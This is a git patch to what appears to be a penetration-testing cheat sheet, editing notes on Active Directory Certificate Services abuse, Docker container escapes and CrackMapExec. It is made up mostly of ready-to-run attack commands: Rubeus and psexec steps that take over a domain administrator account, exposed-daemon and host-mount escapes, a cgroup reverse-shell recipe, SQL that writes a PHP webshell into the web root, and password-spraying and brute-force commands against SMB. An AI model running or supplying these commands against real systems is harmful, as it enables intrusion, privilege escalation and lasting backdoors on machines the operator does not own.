From bbef002f0a2e0dd6606d2e7c650fbc5907f882d2 Mon Sep 17 00:00:00 2001
From: whackx <poisson_iv@web.de>
Date: Thu, 11 Jan 2024 05:40:49 +0100
Subject: [PATCH] AD certificate and docker escapes

---
 .../Active Directory Certificate Service.md   | 32 +++++++--
 Exploits/Containers/Docker.md                 | 71 ++++++++++---------
 Post Exploitation/Windows/CrackMapExec.md     | 32 ++++++---
 3 files changed, 87 insertions(+), 48 deletions(-)

diff --git a/Cryptography/Active Directory/Active Directory Certificate Service.md b/Cryptography/Active Directory/Active Directory Certificate Service.md
index d8195ea..c5ed838 100644
--- a/Cryptography/Active Directory/Active Directory Certificate Service.md	
+++ b/Cryptography/Active Directory/Active Directory Certificate Service.md	
@@ -28,6 +28,14 @@ Exploitable templates should have the following traits:
     * Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
 * Client authentication EKU for Kerberos authentication --> `Client Authentication`
 * Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
+
+#### Certify
+
+Find information about all registered CAs. For a start take a look at least at
+```sh
+Certify.exe find /vulnerable
+```
+
  
 ### Certificate Creation
 
@@ -36,18 +44,25 @@ Exploitable templates should have the following traits:
 * After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
 * Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
 
-* An alternative is certipy-ad
+An alternative is certipy-ad
+
+#### Certipy-AD
+
+First  `pip install certipy-ad`
+Take a look at the Documentation provided in the [git repositories'
+README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).
+Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.
+[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.
 
 ### Impersonation 
 
-* Request TGT with the created cert
-* Grab TGT
+Request TGT with the created cert.
 
-* On the machine via
+#### On the target machine via
 ```sh
 Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
 ```
-* Select a domain admin via opening `Active Directory Users and Computers`
+Select a domain admin via opening `Active Directory Users and Computers`
 ```sh
 .\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
 ```
@@ -61,6 +76,13 @@ exit
 dir \\<domain>\<dir>$\
 ```
 
+#### On the attacking machine
+
+Use impacket's psexec
+```sh
+psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
+```
+
 ## CVE-2022-26923
 
 * Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
diff --git a/Exploits/Containers/Docker.md b/Exploits/Containers/Docker.md
index c5e9bf0..3e9c9ab 100644
--- a/Exploits/Containers/Docker.md
+++ b/Exploits/Containers/Docker.md
@@ -54,45 +54,39 @@ curl http://example.com:5000/v2/<REPOSITORY>/tags/list
 curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
 ```
 
-## Reversing Docker Images
+## Remote Docker Daemon
 
-* [Dive](https://github.com/wagoodman/dive)
+Users inside the `docker` group may open tcp socket through docker
+In case you find an exposed docker daemon it can be used in the following way
 
 ```sh
-dive <IMAGE-ID>
+docker -H tcp://$TARGET_IP:2375 ps
+docker -H tcp://$TARGET_IP:2375 images
+docker -H tcp://test.com:2375 exec <container> <cmd>
+docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
 ```
 
-## Uploading Images to Registry
-
-* Ever image has a `latest` tag
-* Upload modified docker image as `latest`
-* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
 
 ## RCE via Exposed Docker Daemon
 
-* Users inside the `docker` group may open tcp socket through docker
-* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
-* Confirming via `curl http://test.com:2375/version` on open docker port
-* Execute commands on socket
+Execute commands on socket
 
 ```sh
-docker -H tcp://test.com:2375 ps
-docker -H tcp://test.com:2375 exec <container> <cmd>
-docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
 ```
 
 * [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
 
 ## Escape Container via Exposed Docker Daemon
 
-* Looking for exposed docker sockets
+Look out for exposed docker sockets
 
 ```sh
 find / -name "*sock" 2>/dev/null
 groups
 ```
 
-* Mount the host volume and chroot to it, need alpine image.
+Mount the host volume and chroot to it. Ideally, use an image that is
+installed already, e.g. alpine here.
 
 ```sh
 docker images
@@ -107,34 +101,27 @@ docker run -v /:/host --rm -it <imageID> chroot /host/ bash
 
 ## Shared Namespaces
 
-* Namespaces
-* Cgroups
-* OverlayFS
-
-* Requires root inside the container
-
-* Execute command
+Requires root inside the container
 
 ```sh
 nsenter --target 1 --mount sh
+nsenter --target 1 --mount --uts --ipc --net /bin/bash
 ```
 
 ## Misconfiguration
 
-### capabilities
+### Capabilities
 
-* Privileged container connect to the host directly, not through the docker engine
-* Execution of bins on the host from libs inside the container is possible
+Privileged container connect to the host directly, not through the docker engine.
+Execution of binaries on the host from inside the container is possible.
 
 ```sh
 capsh --print
 ```
 
-* `man capabilities`
-
 * [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
 
-* Exploit and get a reverse shell to the host via
+Exploit and get a reverse shell to the host via
 
 ```sh
 mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
@@ -147,7 +134,7 @@ chmod a+x /exploit
 sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 ```
 
-* The file may appear outside the container on the host system
+Caveat: The file may appear outside the container on some host systems. Have to investigate...
 
 ### cap_admin
 
@@ -169,8 +156,8 @@ the docker volume, e.g.
 
 ## Check fdisk
 
-* `fdisk -l` and `lsblk`, host bulk device may be exposed
-* Mount the device
+`fdisk -l` and `lsblk`, host bulk device may be exposed
+Mount the device
 
 ```sh
 mkdir /mnt/hostdev
@@ -218,6 +205,20 @@ Connection: Upgrade
 Upgrade: tcp
 ```
 
+## Reversing Docker Images
+
+* [Dive](https://github.com/wagoodman/dive)
+
+```sh
+dive <IMAGE-ID>
+```
+
+## Uploading Images to Registry
+
+* Ever image has a `latest` tag
+* Upload modified docker image as `latest`
+* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
+
 ## Escape through DB
 
 * Login into DB
@@ -226,14 +227,14 @@ Upgrade: tcp
 * Select table content into a file the user can read
 * Execute the file
 
-```sql
+```SQL
 create table h4x0r (pwn varchar(1024));
 insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
 select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
 copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
 ```
 
-* curl the webshell hon the exploited host
+curl the webshell hon the exploited host
 
 ```sh
 curl <host-IP>/shell.php?cmd=id
diff --git a/Post Exploitation/Windows/CrackMapExec.md b/Post Exploitation/Windows/CrackMapExec.md
index d7c9516..2124c38 100644
--- a/Post Exploitation/Windows/CrackMapExec.md	
+++ b/Post Exploitation/Windows/CrackMapExec.md	
@@ -1,23 +1,39 @@
 # Crackmapexec
 
-* Dictionary attack against SMB
-```sh 
-cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
+## Dictionary attack against SMB
+
+```sh
+cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute
 ```
-* Use the password with `impacket/examples/psexec.py` in the following way
+
+## Brute Force attack against SMB
+
+Brute force attack using an anonymous user
+
+```sh
+cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
+```
+
+## Use Found Password
+
+Use the password with `impacket/examples/psexec.py` in the following way
+
 ```sh
 psexec.py domain.name/<user>:<password>@<target-IP>
 ```
 
-## Shares
+## Enumerate Shares
 
-* Check user permissions on shares
-``sh
+Check user permissions on shares
+
+```sh
 crackmapexec  smb 10.200.x.0/24 -u <user> -p <password> --shares
 ```
 
 ## SMB
-* Check user hash on the network via smb
+
+Check user hash on the network via smb
+
 ```sh
  crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
 ```